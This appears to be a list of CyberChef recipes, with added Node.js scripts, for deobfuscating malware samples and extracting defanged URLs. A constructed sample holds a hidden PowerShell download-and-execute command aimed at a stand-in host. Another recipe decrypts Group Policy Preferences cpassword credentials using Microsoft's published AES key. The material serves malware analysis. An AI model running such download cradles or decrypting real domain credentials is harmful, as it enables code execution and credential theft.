A list of CyberChef recipes
For background see Twitter #cyberchef or https://bitofhex.com/2018/05/29/cyberchef/
Full credit to @GCHQ for producing the tool. See: https://gchq.github.io/CyberChef/
A very common scenario: extract the Base64 blob, inflate it, then beautify the resulting code. Note that the recipe uses Raw Inflate rather than Inflate: PowerShell stagers built on IO.Compression.DeflateStream emit headerless DEFLATE data, which Inflate (expecting a zlib header) rejects. Depending on the next stage you may need to do further processing or dynamic analysis.
Filename: ahack.bat
Sample: SHA256 cc9c6c38840af8573b8175f34e5c54078c1f3fb7c686a6dc49264a0812d56b54
[{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Raw Inflate","args":[0,0,"Adaptive",false,false]},{"op":"Generic Code Beautify","args":[]}]
CyberChef won't be able to handle every Invoke-Obfuscation mode, but here is one that can be decoded. The recipe strips the escape and padding characters (^ \ - _ / and whitespace), reverses the string, beautifies it, repairs the http: prefixes whose slashes were removed by the first step, then extracts and defangs the URLs. Because the slash removal also destroys path separators, treat the extracted URLs as scheme plus host rather than full paths.
Filename: Acknowledgement NUT-95-52619.eml
Sample: SHA256 1240695523bbfe3ed450b64b80ed018bd890bfa81259118ca2ac534c2895c835
[{"op":"Find / Replace","args":[{"option":"Regex","string":"\\^|\\\\|-|_|\\/|\\s"},"",true,false,true,false]},{"op":"Reverse","args":["Character"]},{"op":"Generic Code Beautify","args":[]},{"op":"Find / Replace","args":[{"option":"Simple string","string":"http:"},"http://",true,false,true,false]},{"op":"Extract URLs","args":[false]},{"op":"Defang URL","args":[true,true,true,"Valid domains and full URLs"]}]
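The same strip, reverse, repair and defang steps as a Node.js script, added here as an example (it is not code from this page or from CyberChef). The function names, the URL regex and the obfuscated sample are mine; the sample is a reversed one-liner peppered with cmd.exe carets, built inline, not the real .eml.

```javascript
// Added example (not from the page or CyberChef): the reverse-and-strip recipe
// as a Node.js script, run against a constructed sample.

// Exactly the character class the recipe's Find / Replace removes:
// cmd.exe caret escapes, backslashes, dashes, underscores, slashes, whitespace.
const NOISE = /\^|\\|-|_|\/|\s/g;

function deobfuscateReversed(obfuscated) {
  const cleaned = obfuscated.replace(NOISE, "");
  const forward = cleaned.split("").reverse().join("");
  // Stripping "/" also removed the "//" after every URL scheme. The recipe
  // repairs "http:" only; this repairs "https:" as well. Path slashes are gone
  // for good, so recovered URLs are scheme + host, not full paths.
  return forward.replace(/https?:(?!\/\/)/g, "$&//");
}

// Scheme + host (+ optional path, if any survived) of each URL in the text.
const URL_RE = /https?:\/\/[A-Za-z0-9.-]+(?:\/[^\s'"()]*)?/g;

// Defang like CyberChef's "Defang URL" does for the scheme and the dots.
function extractDefangedUrls(text) {
  return (text.match(URL_RE) || []).map((u) =>
    u.replace(/^http/, "hxxp").replace(/\./g, "[.]"));
}

// Constructed sample (mine, not from a real mail): the command reversed and
// with a caret inserted between every character, roughly what the
// string-reverse output of Invoke-Obfuscation looks like at the cmd level.
const FORWARD =
  "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.com')\"";
const SAMPLE = FORWARD.split("").reverse().join("^");

const cleaned = deobfuscateReversed(SAMPLE);
console.log(cleaned);
console.log(extractDefangedUrls(cleaned));
```

The order matters: the scheme can only be repaired after the reversal, and the noise class has to be removed before reversing or the carets land between the wrong characters. Dashes and spaces in the real command are lost too, which is fine for IOC extraction but not for reading the command back.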
Malware and scripts often use charcode (for example JavaScript's String.fromCharCode) to represent characters in order to evade AV and EDR solutions. CyberChef eats this up: the recipe below makes two passes, first on comma-separated codes and then on space-separated ones, so a second layer using the other delimiter is decoded as well.
Source: https://gist.github.com/jonmarkgo/3431818
[{"op":"Regular expression","args":["User defined","([0-9]{2,3}(,\\s|))+",true,true,false,false,false,false,"List matches"]},{"op":"From Charcode","args":["Comma",10]},{"op":"Regular expression","args":["User defined","([0-9]{2,3}(,\\s|))+",true,true,false,false,false,false,"List matches"]},{"op":"From Charcode","args":["Space",10]}]
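A loop version of the two-pass recipe under Node.js, added here as an example (not code from this page or from CyberChef). It goes a little beyond the recipe: it accepts either delimiter in every pass and keeps decoding until no charcode run is left, and it decodes runs in place so the surrounding code survives. The regex, the function names and the nested sample are mine.

```javascript
// Added example (not from the page or CyberChef): decode charcode runs with
// either delimiter and keep peeling until no run is left.

// Three or more 2-3 digit numbers separated by commas (optional spaces) or by
// whitespace. Printable ASCII is 32..126, so 2-3 digits covers every code.
const CHARCODE_RUN = /\b\d{2,3}(?:(?:\s*,\s*|\s+)\d{2,3}){2,}\b/g;

// Replace every charcode run in place, keeping the surrounding code intact
// (the recipe's "List matches" output keeps only the codes themselves).
function decodeCharcodeRuns(text) {
  return text.replace(CHARCODE_RUN, (run) =>
    run.split(/\s*,\s*|\s+/).map((n) => String.fromCharCode(parseInt(n, 10))).join(""));
}

function peelCharcode(text, maxLayers = 8) {
  let layers = 0;
  while (layers < maxLayers) {
    const next = decodeCharcodeRuns(text);
    if (next === text) break; // fixed point: nothing left to decode
    text = next;
    layers += 1;
  }
  return { text, layers };
}

// Constructed sample (mine): two nested String.fromCharCode layers, the outer
// one comma-separated and the inner one space-separated, as the recipe expects.
const toCodes = (s, sep) => [...s].map((c) => c.charCodeAt(0)).join(sep);
const STAGE2 = 'document.write("Hi")';
const STAGE1 = `eval(String.fromCharCode(${toCodes(STAGE2, " ")}))`;
const SAMPLE = `eval(String.fromCharCode(${toCodes(STAGE1, ", ")}))`;

console.log(peelCharcode(SAMPLE));
```

The run must be at least three numbers long so that ordinary version strings or port lists are not mistaken for charcode; lower the minimum if a sample hides single characters.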
When a new GPP is created, there is an associated XML file created in SYSVOL with the relevant configuration data, and if a password is provided it is stored AES-256 encrypted in the cpassword attribute. Microsoft published the AES key, which can be used to decrypt passwords stored under: \\SYSVOL\<DOMAIN>\Policies\ (the recipe decodes the Base64 value, decrypts it with AES-256-CBC using that key and an all-zero IV, then decodes the UTF-16LE plaintext). MS14-025 removed the ability to save new passwords this way, but XML files already in SYSVOL keep their cpassword values until they are deleted.
Credit: @cyb3rops
Source 1: https://twitter.com/cyb3rops/status/1036642978167758848
Source 2: https://adsecurity.org/?p=2288
[{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"To Hex","args":["None"]},{"op":"AES Decrypt","args":[{"option":"Hex","string":"4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"},{"option":"Hex","string":""},"CBC","Hex","Raw",{"option":"Hex","string":""}]},{"op":"Decode text","args":["UTF16LE (1200)"]}]
CyberChef can use labels to mark parts of the recipe and then jump back to them to perform operations multiple times. In this example there are 29 rounds of Base64 encoding, each of which is extracted and decoded: the Jump operation returns to the "top" label 28 times, so the extract, decode and inflate steps run 29 times before the final beautify. Adjust the jump count to the number of layers in your sample.
Credit: @pmelson
Source 1: https://pastebin.com/hmCPDnHs
Source 2: https://twitter.com/pmelson/status/1078776229996752896
[{"op":"Label","args":["top"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Raw Inflate","args":[0,0,"Adaptive",false,false]},{"op":"Jump","args":["top",28]},{"op":"Generic Code Beautify","args":[]}]
Google embeds its own timestamp in the ei parameter of its URLs; I call it ei time. The recipe decodes the URL-safe Base64 value, takes the first four bytes, swaps them from little-endian byte order and reads the result as a Unix timestamp in seconds.
Source: https://bitofhex.com/2018/05/29/cyberchef/
[{"op":"From Base64","args":["A-Za-z0-9-_=",true]},{"op":"To Hex","args":["None"]},{"op":"Take bytes","args":[0,8,false]},{"op":"Swap endianness","args":["Hex",4,true]},{"op":"From Base","args":[16]},{"op":"From UNIX Timestamp","args":["Seconds (s)"]}]
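The same read under Node.js, added here as an example (not code from this page, from CyberChef or from Google): the recipe's To Hex, Take bytes, Swap endianness and From Base chain collapses to one little-endian 32-bit read. The function names are mine, and because no real ei value is reproduced here the block builds a constructed one from a chosen date; what the bytes after the timestamp mean is not covered by the page and is left alone.

```javascript
// Added example (not from the page or CyberChef): read the ei timestamp.

function eiFromUrl(url) {
  return new URL(url).searchParams.get("ei");
}

function eiToDate(ei) {
  // Node's base64 decoder also accepts the URL-safe alphabet (- and _) the
  // recipe lists and tolerates the missing '=' padding used in URLs.
  const bytes = Buffer.from(ei, "base64");
  if (bytes.length < 4) throw new Error("ei value too short");
  const seconds = bytes.readUInt32LE(0); // the recipe's Swap endianness + From Base
  return new Date(seconds * 1000);
}

// Inverse, only to build a sample: timestamp first, then arbitrary trailing
// bytes (assumption: real values carry more data after the timestamp, whose
// meaning is not covered here).
function makeEi(date, trailing) {
  const buf = Buffer.alloc(4 + trailing.length);
  buf.writeUInt32LE(Math.floor(date.getTime() / 1000), 0);
  trailing.copy(buf, 4);
  return buf.toString("base64").replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
}

// Constructed sample (mine), not a real Google URL.
const SAMPLE_EI = makeEi(
  new Date(Date.UTC(2018, 4, 29, 10, 30, 0)),
  Buffer.from([0xff, 0xfe, 0xab, 0xcd, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06]));
const SAMPLE_URL = `https://www.google.com/search?q=cyberchef&ei=${SAMPLE_EI}`;

console.log(SAMPLE_EI, eiToDate(eiFromUrl(SAMPLE_URL)).toISOString());
```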
Example of loops over Base64: (Credit: @QW5kcmV3) https://twitter.com/QW5kcmV3/status/1079095274776289280
Example of multi-stage obfuscation (Credit: @JohnLaTwC) https://twitter.com/JohnLaTwC/status/1062419803304976385
Happy to add (and learn) more.
Please include the original source of the text and the recipe developer (if not yourself). For consistency in pasting into CyberChef I have found the best results come from exporting the recipe as compact JSON.